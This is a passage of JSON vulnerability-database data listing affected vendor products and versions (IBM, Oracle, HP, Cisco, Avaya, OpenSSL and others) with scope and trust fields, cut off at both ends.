            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.22"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.1"
          },
          {
            "_id": null,
            "model": "db2 enterprise server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "ringmaster appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5"
          },
          {
            "_id": null,
            "model": "integrated management module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.47"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler for applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "domino interim fix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.06"
          },
          {
            "_id": null,
            "model": "websphere process server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.15"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.051"
          },
          {
            "_id": null,
            "model": "java sdk sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "java sdk sr1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8"
          },
          {
            "_id": null,
            "model": "clustered data ontap",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "websphere real time sr7 fp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.3.0.5"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "bbm meetings for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "business process manager advanced",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.6"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.2"
          },
          {
            "_id": null,
            "model": "bes",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "50"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "system m4 bd type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365054660"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.10.1"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8x"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "jre update28",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.6"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.4.19"
          },
          {
            "_id": null,
            "model": "telepresence supervisor mse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "80500"
          },
          {
            "_id": null,
            "model": "iptv",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.11"
          },
          {
            "_id": null,
            "model": "upward integration modules integrated installer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.3"
          },
          {
            "_id": null,
            "model": "jdk update13",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1.3"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.11"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "web security appliance 9.0.0 -fcs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.02"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 24998 176",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.6"
          },
          {
            "_id": null,
            "model": "mint",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "application networking manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "3"
          },
          {
            "_id": null,
            "model": "sterling control center ifix04",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.0.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.2"
          },
          {
            "_id": null,
            "model": "link for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.0.1.12"
          },
          {
            "_id": null,
            "model": "jdk update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "tivoli monitoring",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.024"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "jdk update23",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.045"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.03"
          },
          {
            "_id": null,
            "model": "x-series xos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "java sdk 7r1 sr3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3690x571490"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.3.6"
          },
          {
            "_id": null,
            "model": "telepresence video communication server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 33",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "aura application server sip core pb3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53003.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.038"
          },
          {
            "_id": null,
            "model": "db2 purescale feature",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "system management homepage b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.186"
          },
          {
            "_id": null,
            "model": "cognos planning",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0f",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.040"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "meetingplace",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.1.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.2.0.5"
          },
          {
            "_id": null,
            "model": "nexus series switches",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "35000"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0b",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for traffic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "initiate master data service patient hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.029"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.1.0.5"
          },
          {
            "_id": null,
            "model": "expressway series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "network node manager ispi for mpls vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "57100"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pete6l",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.11"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2.3"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.11"
          },
          {
            "_id": null,
            "model": "integrated management module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.00"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.12"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.1.1154"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "mobile wireless transport manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1.6"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "mate design",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.85"
          },
          {
            "_id": null,
            "model": "aura system manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "infosphere master data management",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4.143"
          },
          {
            "_id": null,
            "model": "clustered data ontap antivirus connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "chassis management module 2peo12p",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.16"
          },
          {
            "_id": null,
            "model": "powervu d9190 conditional access manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.05"
          },
          {
            "_id": null,
            "model": "bes12 client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.0.0.74"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.023"
          },
          {
            "_id": null,
            "model": "jre update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.41"
          },
          {
            "_id": null,
            "model": "lotus widget factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.1"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x353071600"
          },
          {
            "_id": null,
            "model": "tivoli access manager for e-business",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "cics transaction gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "jdk 0 09",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip telephony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "aura conferencing sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1d",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.470"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2.0-12"
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1.2"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.13"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.022"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.1.0.7"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "workload deployer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.11"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.2"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.09"
          },
          {
            "_id": null,
            "model": "rational developer for aix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ip office application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.021"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.11"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.29"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5.146"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "4"
          },
          {
            "_id": null,
            "model": "telepresence mcu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "45000"
          },
          {
            "_id": null,
            "model": "bbm meetings for mac",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0n",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "aura session manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "java sdk 6r1 sr8-fp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.10.3"
          },
          {
            "_id": null,
            "model": "websphere real time sr5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "sterling control center ifix03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.2.1"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1.1"
          },
          {
            "_id": null,
            "model": "domino fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.36"
          },
          {
            "_id": null,
            "model": "webex meetings for android",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip telephony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.3.1"
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "jdk update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.1.0.9"
          },
          {
            "_id": null,
            "model": "websphere real time sr8 fp10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "sterling connect:direct for hp nonstop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "endeca server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "rational agent controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.06"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90007.5.1.0"
          },
          {
            "_id": null,
            "model": "aura application server sip core",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53003.0"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.02"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler for applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.07"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.11"
          },
          {
            "_id": null,
            "model": "virtual connect enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi for net",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50006.3"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser ifix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.0.213"
          },
          {
            "_id": null,
            "model": "jdk update25",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "aura experience portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "aura experience portal sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.3.0.12"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2.3"
          },
          {
            "_id": null,
            "model": "phaser 3300mfp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "20.105.52.000"
          },
          {
            "_id": null,
            "model": "rational sap connector",
